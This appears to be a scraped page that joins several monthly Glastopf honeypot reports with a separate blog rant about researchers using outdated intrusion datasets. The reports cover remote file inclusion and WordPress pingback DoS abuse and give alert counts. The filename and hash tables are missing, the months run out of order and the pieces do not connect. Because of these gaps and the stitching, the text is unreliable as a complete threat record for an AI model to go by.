During the month of June the following information was obtained from Glastopf installations worldwide

Geographical spread

10 most popular injected files during the period

Short introduction to RFI:

“Remote File Inclusion (RFI) is a type of vulnerability most often found on websites. It allows an attacker to include a remote file, usually through a script on the web server. The vulnerability occurs due to the use of user-supplied input without proper validation. This can lead to something as minimal as outputting the contents of the file or more serious events such as: Code execution on the web server .. “ source: Wikipedia

During the month of April the following information was obtained from Glastopf installations worldwide

Number of alert for the period: 1325919

Filenames (RFI) - 10 most common during the period:

Hashes - 10 most common during the period:

Specifically newsworthy event: Ping back”

pingback.ping, which is a legit WordPress feature is misused to DoS victims using legit WordPress sites.

During the month of May the following information was obtained from Glastopf installations worldwide

Number of alert for the period: 1859863

Filenames (RFI) - 10 most popular during the period:

Hashes - 10 most popular during the period:

Ping back

pingback.ping, which is a legit WordPress feature misused to DoS victims using legit WordPress sites.

UPDATE: the log data is posted here.  A notification group about new log sharing is here.

This WASL 2009 workshop reminded me that I always used to bitch that some academic researchers use antediluvian data sets for their research (Lincoln labs 1998 set used in 2008 “security research”  makes me want to just curse and kick people in the balls, then laugh, then cry, then cry more…).

However, why are they doing it? Don’t they realize that testing their “innovative intrusion detection” or “neural network-based log analysis” on such prehistoric data will not render it relevant to today’s threats? And will only ensure ensuing hilarity :-)